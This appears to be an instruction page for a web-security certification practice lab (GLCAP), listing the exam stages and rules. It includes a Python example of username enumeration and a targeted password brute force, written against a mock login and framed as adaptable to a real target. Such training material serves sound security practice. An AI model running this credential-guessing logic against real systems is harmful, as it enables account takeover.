Welcome, tester, to the GLCAP exam lab! This exam follows many of the rules set out by PortSwigger's BSCP and is built to help you train for that certification. The stages and rules are set out below in case you need a reminder while you test:
The lab consists of three stages:
Stage 1: Initial Access - Gain access to a user account on the application.
Stage 2: Privilege Escalation - Gain access to the admin panel located at /admin.
Stage 3: Read the file located at "/glcap/flag.txt" from the server's local file system.
Once you have the flag, submit it to your exam assessor and you will receive your kudos!
1. The GLCAP must be completed in order. You CANNOT skip a stage: do not try to reach /admin without first completing stage 1.
2. If you come across a user enumeration vulnerability, you may be able to use the username and password lists to brute-force valid credentials for any enumerated users.
3. Do not attack the exploit server. It is not in scope for the test and is there to HELP you.
4. There will always be an admin account with the username "admin" and a low-privilege account, usually called "don".
5. There will always be at most one simulated active user, who will click on any links they are sent via the exploit server and will visit the home page every 10 seconds.
6. Automation is required to solve this lab (if you can solve it without automation, please let your assessor know how you did it!). You will need Burp Suite Pro's scanner, HTTP Request Smuggler and Param Miner at the very least.
7. Guessing endpoints and headers is fair game; some stages require it. That said, every secret endpoint and header can be found in SecLists' "common.txt" and Param Miner's "basic" list.
8. If you find an SSRF vulnerability, you can use it to read files from an internal-only service hosted at http://192.168.0.254:5024/
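To make rule 2 concrete, the following is an added example (not part of the lab or its tooling) of the two-step approach it describes: first confirm that the login error differs for known versus unknown usernames, then spend password guesses only on the usernames that oracle confirms. The mock_login function, the account names and passwords in it, and the wordlists are all constructed here for the example; against the real target you would replace mock_login with a function that submits the login form and returns the status code and body, and you would watch for account lockout and rate limiting before running the full list.

```python
# Added example: user enumeration followed by a targeted brute force.
# mock_login is a CONSTRUCTED stand-in for the target's login endpoint;
# the accounts and passwords below are invented for this example only.
_MOCK_ACCOUNTS = {"don": "password1", "carlos": "s3cret-unlisted"}


def mock_login(username, password):
    """Return (status_code, body) the way a real login request would.

    The only behaviour modelled is the enumeration oracle: the failure
    message differs depending on whether the username exists.
    """
    if username not in _MOCK_ACCOUNTS:
        return 401, "Invalid username"
    if _MOCK_ACCOUNTS[username] != password:
        return 401, "Incorrect password"
    return 302, "Redirecting to /my-account"


def enumerate_users(login, candidates, canary="zz-no-such-user-zz"):
    """Return candidate usernames whose failure response differs from a
    guaranteed-unknown username's response.

    Comparing the whole (status, body) tuple works for this mock; on a real
    app you would normalise away per-request noise such as CSRF tokens and
    compare status, length and the error string instead.
    """
    baseline = login(canary, "not-the-password")
    return [u for u in candidates if login(u, "not-the-password") != baseline]


def brute_force(login, users, passwords, success=lambda r: r[0] in (301, 302)):
    """Try every password for each confirmed user; stop at the first hit per user.

    Returns a dict of username -> password for the accounts that logged in.
    """
    found = {}
    for user in users:
        for password in passwords:
            if success(login(user, password)):
                found[user] = password
                break  # no need to keep guessing once this account is cracked
    return found


if __name__ == "__main__":
    # Constructed wordlists; the lab supplies its own.
    username_list = ["alice", "don", "carlos", "bob"]
    password_list = ["letmein", "password1", "qwerty"]

    valid_users = enumerate_users(mock_login, username_list)
    print("enumerated users:", valid_users)
    print("cracked:", brute_force(mock_login, valid_users, password_list))
```

Because enumeration runs one request per candidate username and the brute force then runs only against confirmed accounts, the total request count is len(usernames) + len(confirmed) * len(passwords) instead of len(usernames) * len(passwords), which is what makes the supplied wordlists practical within the lab's time limits.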
In addition to the techniques taught in PortSwigger's Web Security Academy, many of the cases you will encounter are based on our experience in GhostLabs, so I would highly recommend being comfortable with the tooling resources documented here.